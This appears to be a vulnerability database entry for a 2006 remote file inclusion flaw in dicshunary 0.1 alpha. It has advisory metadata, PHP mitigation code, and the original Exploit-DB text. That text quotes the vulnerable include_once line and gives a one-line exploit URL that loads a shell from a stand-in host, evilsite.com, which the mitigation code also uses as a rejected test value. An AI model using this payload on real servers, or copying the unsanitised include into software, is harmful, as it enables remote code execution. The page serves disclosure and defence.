Vendor: dicshunary 0.1 alpha
By: DeltahackingTEAM
CVSS: 7.5 (HIGH)
Class: Remote File Inclusion
CWE: 98
Product Name: dicshunary 0.1 alpha
Affected Version From: dicshunary 0.1 alpha
Affected Version To: dicshunary 0.1 alpha
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

dicshunary 0.1 alpha Remote File Inclusion Vulnerability

dicshunary 0.1 alpha is prone to a remote file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
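
One way to apply that validation to the include_once statement quoted in the advisory, as an added example that is not dicshunary's code or part of the original advisory: the path is resolved first and must stay inside a fixed application directory. The function name, the temporary demo directory and the sample values are constructed for illustration; how the query parameter reaches $dicshunary_root_path in check_status.php is not shown on the page.

```php
<?php
// Added example, not dicshunary's code; names and sample values are illustrative.

/**
 * Build the include path from $rootPath . $file and return it only if it
 * resolves to an existing file inside $trustedBase; otherwise throw.
 */
function checked_include_path(string $trustedBase, string $rootPath, string $file): string
{
    $candidate = $rootPath . $file;
    // A scheme prefix (http://, ftp://, php://, data:) is never a local path.
    // Two or more characters are required so Windows drive letters still pass.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate)) {
        throw new InvalidArgumentException("URL or wrapper rejected: $candidate");
    }
    // realpath() collapses ../ segments and returns false for missing files.
    $base = realpath($trustedBase);
    $resolved = realpath($candidate);
    if ($base === false || $resolved === false
        || strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException("outside include root: $candidate");
    }
    return $resolved;
}

// Constructed demo tree standing in for the application directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dicshunary_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'common.inc', "<?php // stub\n");

// Values the root-path variable might hold when the include is reached.
$rootPaths = [
    $base . DIRECTORY_SEPARATOR,                   // intended local root
    'http://evilsite.com/shell?',                  // value from the advisory's request
    $base . DIRECTORY_SEPARATOR . '..' . DIRECTORY_SEPARATOR,  // steps out of the root
];
foreach ($rootPaths as $dicshunary_root_path) {
    try {
        include_once checked_include_path($base, $dicshunary_root_path, 'common.inc');
        echo "included from: $dicshunary_root_path\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}

unlink($base . DIRECTORY_SEPARATOR . 'common.inc');
rmdir($base);
```

Independently of application code, setting allow_url_include=Off in php.ini stops include and include_once from fetching URLs.
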
Source

Exploit-DB raw data:

**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name :dicshunary 0.1 alpha

* Class = Remote File Inclusion ;
 
* Download =http://puzzle.dl.sourceforge.net/sourceforge/dicshunary/dicshunary_0.1alpha.tar.gz

* Found by = DeltahackingTEAM

* User In Delta Team (TAnha & Dr.Pantagon )

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

include_once($dicshunary_root_path.'common.inc');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/check_status.php?dicshunary_root_path=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

SP TNX : Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc,

**********************************************************************************************************

# milw0rm.com [2006-11-17]